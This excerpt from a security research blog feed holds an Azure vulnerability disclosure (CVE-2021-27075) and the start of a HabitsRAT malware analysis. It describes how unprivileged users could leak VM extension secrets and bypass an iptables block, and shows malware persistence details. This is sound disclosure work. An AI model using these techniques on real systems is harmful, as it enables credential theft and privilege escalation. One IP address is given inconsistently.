not enough because once a vulnerability in the tool is exploited by an
attacker, the only way to detect and stop the attack is by detecting
unauthorized code or commands in runtime. This capability is not natively
supported by AWS and GCP. Azure offers
&lt;a href="https://intezer.com/blog/incident-response/autonomous-soc-for-microsoft-defender/"target="_blank" rel="noopener"&gt;Microsoft defender&lt;/a&gt;
however it has limited support for Linux which runs 90% of the cloud.&lt;/p&gt;
&lt;h2&gt;Misconfigurations are the Leading Cause of Attacks&lt;span class="hx:absolute hx:-mt-20" id="misconfigurations-are-the-leading-cause-of-attacks"&gt;&lt;/span&gt;
&lt;a href="#misconfigurations-are-the-leading-cause-of-attacks" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;A whopping 99% of
&lt;a href="https://www.cio.com/article/3529426/posture-management-cloud-security-tools-rise-in-wake-of-breaches.html"target="_blank" rel="noopener"&gt;cloud security failures&lt;/a&gt;
are expected to be the fault of the customer through 2025. Despite the variety
of tools and policies, setting up and maintaining a secured environment relies
on skilled and experienced professionals. Yet, people can make mistakes that
can compromise information or expose the infrastructure to attacks. For
example:
&lt;a href="https://www.infosecurity-magazine.com/news/fedex-s3-bucket-exposes-private/"target="_blank" rel="noopener"&gt;FedEx exposed information by leaving an exposed storage server&lt;/a&gt;.
The
&lt;a href="https://money.cnn.com/2017/11/17/technology/centcom-data-exposed/"target="_blank" rel="noopener"&gt;Pentagon&lt;/a&gt;
exposed &lt;a href="https://www.bbc.com/news/technology-42166004"target="_blank" rel="noopener"&gt;100 GB of data&lt;/a&gt; from a
joint intelligence program with the U.S. Army and National Security Agency. The
data had been available for years in a publicly exposed S3 bucket. The attack
using a
&lt;a href="../../../2020/07/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/"&gt;misconfigured Docker port&lt;/a&gt;
drops the Doki malware which installs a backdoor on the victim&amp;rsquo;s machine and
executes a cryptomining malware. 73% of companies leave SSH ports
&lt;a href="https://www.eweek.com/security/misconfiguration-of-aws-services-by-users-exposes-cloud-security-risks/"target="_blank" rel="noopener"&gt;publicly exposed&lt;/a&gt;.
Sometimes the user is not aware of the misconfiguration only until a breach
occurs and the damage is done. In this case, a runtime protection solution can
stop the attack before it causes more damage.&lt;/p&gt;
&lt;h2&gt;Unauthorized Access to Cloud Workloads&lt;span class="hx:absolute hx:-mt-20" id="unauthorized-access-to-cloud-workloads"&gt;&lt;/span&gt;
&lt;a href="#unauthorized-access-to-cloud-workloads" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Credentials and permissions have an important role in securing the
infrastructure and cloud providers offer dedicated tools like Identity and
Access Management (IAM). However, when attackers or malicious insiders gain or
steal credentials to cloud assets they
&lt;a href="https://www.darkreading.com/attacks-breaches/compromised-credentials-show-that-abuse-happens-in-multiple-phases/d/d-id/1340179"target="_blank" rel="noopener"&gt;can cause extensive damage&lt;/a&gt;
to the entire cloud environment. Attackers used
&lt;a href="https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/"target="_blank" rel="noopener"&gt;Tesla&amp;rsquo;s Kubernetes dashboard&lt;/a&gt;
that was exposed to the public internet and not password protected. One of the
pods contained access credentials for Tesla&amp;rsquo;s AWS environment which included an
Amazon S3 bucket that stored sensitive information and telemetry. The attackers
ran
&lt;a href="../../../2021/01/a-rare-look-inside-a-cryptojacking-campaign-and-its-profit/"&gt;cryptomining malware&lt;/a&gt;
on the server and took measures to hide the activity of the miner. The
attackers used atypical ports for communicating with the mining pools and they
also did not use well-known mining pool hosts. When an attacker bypasses all
security measures, having clear visibility into what code is running on your
systems enables you to identify and stop the attack before the attacker gains
remote access to other assets. Having runtime security measures in the
environment will help to identify and mitigate attacks on cloud workloads. But
not all cloud vendors have these tools, specifically for Linux.&lt;/p&gt;
&lt;h2&gt;You Need Runtime Protection&lt;span class="hx:absolute hx:-mt-20" id="you-need-runtime-protection"&gt;&lt;/span&gt;
&lt;a href="#you-need-runtime-protection" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Currently, AWS and GCP do not offer a runtime Cloud Workload Protection
Platform (CWPP) focused on what is running &amp;ldquo;inside the machine.&amp;rdquo; Azure has a
CWPP but it&amp;rsquo;s mostly focused on Windows threats, which means you still need a
third party tool to secure your Linux workloads. Runtime visibility and
protection for your cloud-hosted applications is a critical control that is not
supported by the cloud providers. At Intezer, we recommend protecting the
runtime environment as a key security control. Most research shows that nearly
all successful attacks are based on running unauthorized code or commands,
regardless of how the attacker got in. Risk reduction programs like
vulnerability scanning and misconfiguration management are very important but
they take a lot of time. If you take an assume breach mentality, an attacker
will eventually get through, making the last line of defense a priority.
Protecting the runtime environment buys you time to do larger programs to
reduce risk and have a more holistic cloud security. Runtime protection is also
needed to detect and respond to attacks. If an attacker exploits an unknown
vulnerability or a backdoor in the supply chain you must be able to detect it.&lt;/p&gt;</description></item><item><title>CVE-2021-27075: Microsoft Azure Vulnerability Allows Privilege Escalation and Leak of Private Data</title><link>https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/</link><pubDate>Tue, 11 May 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/</guid><description>
&lt;p&gt;In this post I will explain how the Microsoft Azure Virtual Machine (VM)
extension works and how we found a fatal vulnerability in the extension
mechanism affecting Azure VM Linux systems. As part of the responsible
disclosure policy, we reported the vulnerability to Microsoft Security Response
Center (MSRC). They soon patched and assigned it CVE-2021-27075. This
vulnerability would have allowed an unprivileged user to leak any Azure VM
extension&amp;rsquo;s private data. Paired with the design of the VMAccess extension, an
official Azure extension built for assisting system admins, we will demonstrate
how this could have been used to achieve &lt;strong&gt;privilege escalation&lt;/strong&gt; and possibly
&lt;strong&gt;lateral movement&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig1.png" title="Proof of Concept" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Proof of Concept&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Azure VM Extensions&lt;span class="hx:absolute hx:-mt-20" id="azure-vm-extensions"&gt;&lt;/span&gt;
&lt;a href="#azure-vm-extensions" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Azure VM offers developers and admins an integrated plugin system to install
additional components onto their machines. Both first party (e.g., Microsoft
Azure Diagnostics and Microsoft Azure Network Watcher) and third party apps
(like Datadog Agent) are offered through this mechanism.&lt;/p&gt;
&lt;p&gt;To manage extension installations and keep them up to date, Microsoft Azure
Guest Agent is installed on the system. This component is open-source and
hosted on &lt;a href="https://github.com/Azure/WALinuxAgent"target="_blank" rel="noopener"&gt;GitHub&lt;/a&gt;. This agent, along
with Azure extensions, is installed at &lt;code&gt;/var/lib/waagent&lt;/code&gt;. This directory is
inaccessible for non-root users as it contains extension-related secrets.&lt;/p&gt;
&lt;p&gt;Extensions are installed in this directory in their own sub directories, e.g.,
&lt;code&gt;/var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-1.4.1587.1&lt;/code&gt;
Many shared configurations are laid out in the root extension directory
&lt;code&gt;/var/lib/waagent&lt;/code&gt;. Here is an example of the directory layout:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig2.png" title="/var/lib/waagent directory structure" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;/var/lib/waagent directory structure&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;When an extension is added to the VM, the extension&amp;rsquo;s configuration file is
updated behind the scenes in the Azure VM manager, also known as the
&lt;a href="https://azure.microsoft.com/en-us/resources/videos/fabric-controller-internals-building-and-updating-high-availability-apps/"target="_blank" rel="noopener"&gt;Fabric Controller&lt;/a&gt;.
The WAAgent constantly polls the Fabric Controller for this file, and once
updated, the extension is downloaded and deployed. In Microsoft Azure Cloud,
the WAAgent communicates with the &amp;lsquo;Wire Server,&amp;rsquo; an HTTP service belonging to
the Fabric Controller. WAAgent communicates with the Fabric Controller by
accessing a special IP address:
&lt;a href="https://docs.microsoft.com/en-us/azure/virtual-network/what-is-ip-address-168-63-129-16"target="_blank" rel="noopener"&gt;&lt;code&gt;168.63.129.16&lt;/code&gt;&lt;/a&gt;.
Through some testing, we discovered that this endpoint is the same as
&lt;code&gt;169.254.169.254&lt;/code&gt;, better known as the
&lt;a href="https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service"target="_blank" rel="noopener"&gt;Azure Instance Metadata Service&lt;/a&gt;
IP address. The WAAgent receives the extension configuration URL by parsing the
&amp;lsquo;GoalState.&amp;rsquo;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig3.png" title="GoalState endpoint request" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;GoalState endpoint request&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;A response looks like this:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig4.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig5.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig6.png" title="GoalState endpoint response" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;GoalState endpoint response&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The GoalState contains URLs to all relevant configurations available to the
Wire Server. Using the GoalState we can query the &lt;code&gt;ExtensionsConfig&lt;/code&gt; file
ourselves:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig7.png" title="ExtensionsConfig endpoint request" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;ExtensionsConfig endpoint request&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Here is an example of how the LinuxDiagnostic extension configuration might
look:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig8.png" title="ExtensionsConfig endpoint response" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;ExtensionsConfig endpoint response&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;protectedSettings&lt;/code&gt; field holds sensitive extension configurations such as
private keys and is additionally protected with an encryption scheme. The
&lt;code&gt;protectedSettingsCertThumbprint&lt;/code&gt; field holds the filename of the key used to
decrypt the &lt;code&gt;protectedSettings&lt;/code&gt;. This key is stored in
&lt;code&gt;/var/lib/waagent/F54265F38F8D16C35C0E1FD3190882831A6C4384.prv&lt;/code&gt; with its
certificate stored in
&lt;code&gt;/var/lib/waagent/F54265F38F8D16C35C0E1FD3190882831A6C4384.crt&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The private key and certificate pair are not supplied by the &lt;code&gt;ExtensionConfig&lt;/code&gt;
file. So, how do they get deployed to the server?&lt;/p&gt;
&lt;p&gt;For this deployment, the &lt;strong&gt;Certificates&lt;/strong&gt; endpoint is used. After reverse
engineering the WAAgent communication with the Wire Server, we observed that
the Certificates endpoint requires a &amp;rsquo;transport&amp;rsquo; certificate which is used to
supply the &lt;code&gt;F542…&lt;/code&gt; extension key:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig9.png" title="Certificates endpoint request" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Certificates endpoint request&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The Wire Server returns an encrypted form of the extension key which can be
decrypted via the Transport Certificate&amp;rsquo;s private key.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig10.png" title="Certificates endpoint response" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Certificates endpoint response&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Leaking Azure VM Extensions&amp;rsquo; Private Data&lt;span class="hx:absolute hx:-mt-20" id="leaking-azure-vm-extensions-private-data"&gt;&lt;/span&gt;
&lt;a href="#leaking-azure-vm-extensions-private-data" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Flaw #1: Certificates Endpoint Does Not Validate Transport Certificate&lt;span class="hx:absolute hx:-mt-20" id="flaw-1-certificates-endpoint-does-not-validate-transport-certificate"&gt;&lt;/span&gt;
&lt;a href="#flaw-1-certificates-endpoint-does-not-validate-transport-certificate" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;An attacker can create their own Transport Private Key and its corresponding
Transport Certificate. Using the Certificate endpoint, the attacker supplies
their own Transport Certificate and receives an encrypted form of the keys from
the Wire Server (in our example this is the
&lt;code&gt;F54265F38F8D16C35C0E1FD3190882831A6C4384&lt;/code&gt; key).&lt;/p&gt;
&lt;p&gt;Finally, the encrypted keys are decrypted via the Transport Key and the
attacker can proceed to decrypt the &lt;code&gt;protectedSettings&lt;/code&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig11.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig12.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;To our surprise, after developing the PoC with the root user, it would not work
with an unprivileged user. It seems that packets destined to the Wire Server
endpoint at &lt;code&gt;168.63.129.16&lt;/code&gt; were not sent out by the server. This is because of
an iptables rule that drops packets which aren&amp;rsquo;t from user ID 0 (root) to the
endpoint:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig13.png" title="Azure VM IPTables" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Azure VM IPTables&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Flaw #2: Bypassing Wire Server Unprivileged Access Defense&lt;span class="hx:absolute hx:-mt-20" id="flaw-2-bypassing-wire-server-unprivileged-access-defense"&gt;&lt;/span&gt;
&lt;a href="#flaw-2-bypassing-wire-server-unprivileged-access-defense" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;As mentioned earlier, we discovered that &lt;code&gt;164.254.164.254&lt;/code&gt; is the same machine
as &lt;code&gt;168.63.129.16&lt;/code&gt;. We replaced every request to &lt;code&gt;168.63.129.16&lt;/code&gt; with
&lt;code&gt;164.254.164.254&lt;/code&gt; and this allowed us to communicate with the Wire Server
without a privileged user. In addition, this iptables defense did not apply to
processes that run in Docker containers (even when the PoC ran as an
unprivileged user), allowing containers to leak information about their host
through the Wire Server. This issue was fixed by MSRC as well.&lt;/p&gt;
&lt;h2&gt;Combining the Flaws&lt;span class="hx:absolute hx:-mt-20" id="combining-the-flaws"&gt;&lt;/span&gt;
&lt;a href="#combining-the-flaws" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Utilizing both flaws, an unprivileged user can leak any Azure VM extension&amp;rsquo;s
private settings. This is especially dangerous when paired with extensions that
handle sensitive data.&lt;/p&gt;
&lt;p&gt;A particularly severe example is the
&lt;a href="https://azure.microsoft.com/nl-nl/blog/using-vmaccess-extension-to-reset-login-credentials-for-linux-vm/"target="_blank" rel="noopener"&gt;VMAccess&lt;/a&gt;
extension, an official Microsoft Azure extension used for changing passwords
conveniently on controlled machines.
&lt;a href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/"target="_blank" rel="noopener"&gt;Guardicore&lt;/a&gt;
previously documented that VMAccess persists passwords in the
&lt;code&gt;protectedSettings&lt;/code&gt; field even after it&amp;rsquo;s done changing the user&amp;rsquo;s password and
no longer needs to keep it on disk.&lt;/p&gt;
&lt;p&gt;Combined with the vulnerability we found, an attacker would be able to elevate
themself to a higher privileged user by leaking the VMAccess admin password.
Also, in the event that the VMAccess password is shared with other Azure VMs
(as is often the case), the attacker could perform lateral movement across the
system. This is what the flow looks like:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig14.png" title="Vulnerability flow" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Vulnerability flow&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;And the proof of concept:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data/images/fig15.png" title="Leaking VMAccess extension data" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Leaking VMAccess extension data&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Takeaways&lt;span class="hx:absolute hx:-mt-20" id="takeaways"&gt;&lt;/span&gt;
&lt;a href="#takeaways" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The CVE issued by Microsoft also applies to other Azure products such as Azure
Spring Cloud, as discovered by researcher
&lt;a href="https://twitter.com/wtm_offensi"target="_blank" rel="noopener"&gt;Wouter ter Maat&lt;/a&gt; independently at a later
date, who was also credited in the CVE. Microsoft fixed the issue after
revamping the whole Linux extension mechanism and no user interaction is needed
to update VMs. This research is meant to further the discussion around the
relationship between cloud service providers (CSPs) and their customers.
Ultimately, the customer is responsible for any data breach that occurs. For a
more complete cloud security strategy, Intezer recommends adopting a
two-pronged approach. Do the basics, like fixing known vulnerabilities and
hardening your systems to reduce the likelihood of getting attacked. You also
need runtime threat detection to identify and respond to attacks as they occur
following unknown vulnerability exploitation or a backdoor in the supply chain.&lt;/p&gt;</description></item><item><title>HabitsRAT Used to Target Linux and Windows Servers</title><link>https://research.intezer.com/blog/2021/04/habitsrat-used-to-target-linux-and-windows-servers/</link><pubDate>Tue, 20 Apr 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/04/habitsrat-used-to-target-linux-and-windows-servers/</guid><description>
&lt;p&gt;We have discovered a new malware written in Go, which we are calling HabitsRAT,
targeting both Windows and Linux machines. The Windows version of the malware
was first reported on by
&lt;a href="https://krebsonsecurity.com/2021/03/no-i-did-not-hack-your-ms-exchange-server/"target="_blank" rel="noopener"&gt;Brian Krebs&lt;/a&gt;
and
&lt;a href="https://www.shadowserver.org/news/shadowserver-special-report-exchange-scanning-5/"target="_blank" rel="noopener"&gt;The Shadowserver Foundation&lt;/a&gt;
in attacks against Microsoft Exchange servers. In addition to this version, we
have identified a newer Windows variant and a variant targeting Linux
environments. As of this writing, the Linux version is undetected by all
Antivirus engines on VirusTotal. We assess that the Linux version is used to
target Linux servers in an adjacent campaign to the one reported by The
Shadowserver Foundation. The malware allows the attacker to control the
compromised machine remotely. To protect themself from being taken over by
others, the attacker&amp;rsquo;s commands are signed by a private key that only the
attacker has access to. The malware does not execute commands that are not
signed by the correct key, suggesting that the malware has been developed by a
sophisticated programmer.&lt;/p&gt;
&lt;h2&gt;Intro&lt;span class="hx:absolute hx:-mt-20" id="intro"&gt;&lt;/span&gt;
&lt;a href="#intro" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;On March 28th, Brian Krebs published a
&lt;a href="https://krebsonsecurity.com/2021/03/no-i-did-not-hack-your-ms-exchange-server/"target="_blank" rel="noopener"&gt;blog post&lt;/a&gt;
about attacks against Microsoft Exchange servers. In one of those attacks, a
webshell called &amp;ldquo;Babydraco&amp;rdquo; was deployed. The webshell was used to deploy a new
malware. The binary had the filename &lt;code&gt;krebsonsecurity.exe&lt;/code&gt; and used a Command
and Control (C2) server located at &lt;code&gt;brian[.]krebsonsecurity[.]top&lt;/code&gt;. This
malware turns out to be a remote access trojan (RAT) that has been written to
target both Windows and Linux machines. Based on strings found in the malware,
we have named it HabitsRAT.&lt;/p&gt;
&lt;p&gt;While the Windows version of the RAT has been documented being installed on
compromised Microsoft Exchange servers, it is not known what type of servers
the Linux version is used against. Still, in the last couple of months,
numerous remote code execution (RCE) vulnerabilities have been disclosed in
hardware and services running on top of Linux. About a month ago, CISA released
an advisory urging users of F5 BIG-IP to apply patches to address RCE
vulnerabilities.&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The HabitsRAT is a simple backdoor that allows the malware operator to execute
arbitrary code on the infected machine. While the backdoor is simple in design,
the malware has functionality making the attack more complex than what is
normally seen. The malware is written in Go and targets at least both Windows
and Linux machines. The structure for the Windows version of the malware,
&lt;a href="https://github.com/goretk/redress/"target="_blank" rel="noopener"&gt;generated by redress&lt;/a&gt;, is shown in the
code snippet below. Most of the code is shared between the Windows version and
the Linux version. The operating system-specific code has been placed in the
files &lt;code&gt;commandplatform_windows.go&lt;/code&gt;, &lt;code&gt;keyplatform_windows.go&lt;/code&gt; and
&lt;code&gt;persistencehandler_windows.go&lt;/code&gt;. The rest of the files are shared with the
Linux version.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Package main: C:/Users/user/habits/habits-client
File: commandhandler.go
RunSignedCommand Lines: 17 to 35 (18)
File: commandplatform_windows.go
RunCommand Lines: 8 to 13 (5)
File: keyhandler.go
GetOrGenerateKey Lines: 13 to 23 (10)
GenerateKey Lines: 23 to 42 (19)
GetKeyStore Lines: 42 to 50 (8)
SetKey Lines: 50 to 68 (18)
GetKey Lines: 68 to 77 (9)
File: keyplatform_windows.go
GetRootKeyStore Lines: 11 to 19 (8)
GetUserKeyStore Lines: 19 to 27 (8)
IsRoot Lines: 27 to 49 (22)
File: main.go
main Lines: 17 to 34 (17)
File: persistencehandler.go
InstallPersistence Lines: 9 to 17 (8)
CopyBinary Lines: 17 to 22 (5)
File: persistencehandler_windows.go
CheckPersistence Lines: 11 to 21 (10)
GetBinStoreRoot Lines: 21 to 29 (8)
GetBinStoreUser Lines: 29 to 37 (8)
InstallPersistRoot Lines: 37 to 98 (61)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The Linux source code structure is shown in the code snippet below. The Linux
specific code has been placed in the files &lt;code&gt;commandplatform_linux.go&lt;/code&gt;,
&lt;code&gt;keyplatform_linux.go&lt;/code&gt; and &lt;code&gt;persistencehandler_systemd_linux.go&lt;/code&gt;.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Package main: C:/Users/user/habits/habits-client
File: commandhandler.go
RunSignedCommand Lines: 17 to 35 (18)
File: commandplatform_linux.go
RunCommand Lines: 8 to 13 (5)
File: keyhandler.go
GetOrGenerateKey Lines: 13 to 23 (10)
GenerateKey Lines: 23 to 46 (23)
GetKeyStore Lines: 46 to 54 (8)
SetKey Lines: 54 to 72 (18)
GetKey Lines: 72 to 84 (12)
IsRootAsString Lines: 84 to 86 (2)
File: keyplatform_linux.go
GetRootKeyStore Lines: 9 to 16 (7)
GetUserKeyStore Lines: 16 to 17 (1)
File: main.go
main Lines: 17 to 34 (17)
File: persistencehandler.go
InstallPersistence Lines: 9 to 17 (8)
CopyBinary Lines: 17 to 20 (3)
File: persistencehandler_systemd_linux.go
Systemd_CheckPersistence Lines: 11 to 25 (14)
Systemd_GetBinStoreUser Lines: 25 to 33 (8)
Systemd_InstallPersistRoot Lines: 33 to 64 (31)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Installation&lt;span class="hx:absolute hx:-mt-20" id="installation"&gt;&lt;/span&gt;
&lt;a href="#installation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;When the binary is run, it installs itself into a folder. The Windows version&amp;rsquo;s
location is &lt;code&gt;%SystemDrive%WindowsDefenderMsMpEng.exe&lt;/code&gt; while the Linux version
is &lt;code&gt;$HOME/.config/polkitd/polkitd&lt;/code&gt;. This will result in the malware being
installed under &lt;code&gt;/root&lt;/code&gt; if it&amp;rsquo;s being run with root privileges.&lt;/p&gt;
&lt;p&gt;After the malware has installed itself, it checks if the persistence method has
been set up. If it hasn&amp;rsquo;t, it goes ahead and sets it up. On Linux, it uses a
&amp;ldquo;systemd&amp;rdquo; unit file. The malware checks if it&amp;rsquo;s already configured by executing
the command &lt;code&gt;systemctl status polkitd&lt;/code&gt;, as shown in Figure 1.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/04/habitsrat-used-to-target-linux-and-windows-servers/images/fig1.png" title="Figure 1: Linux version of the malware checks if persistence has been configured already." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 1: Linux version of the malware checks if persistence has been configured already.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The systemd unit file is created at &lt;code&gt;/etc/systemd/system/polkitd.service&lt;/code&gt; and
its content is shown in the code snippet below.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;[Unit]
Description=Authorization Manager
After=network.target
[Service]
GuessMainPID=no
ExecStart=&amp;#34;/path/to/binary&amp;#34;
Restart=always
[Install]
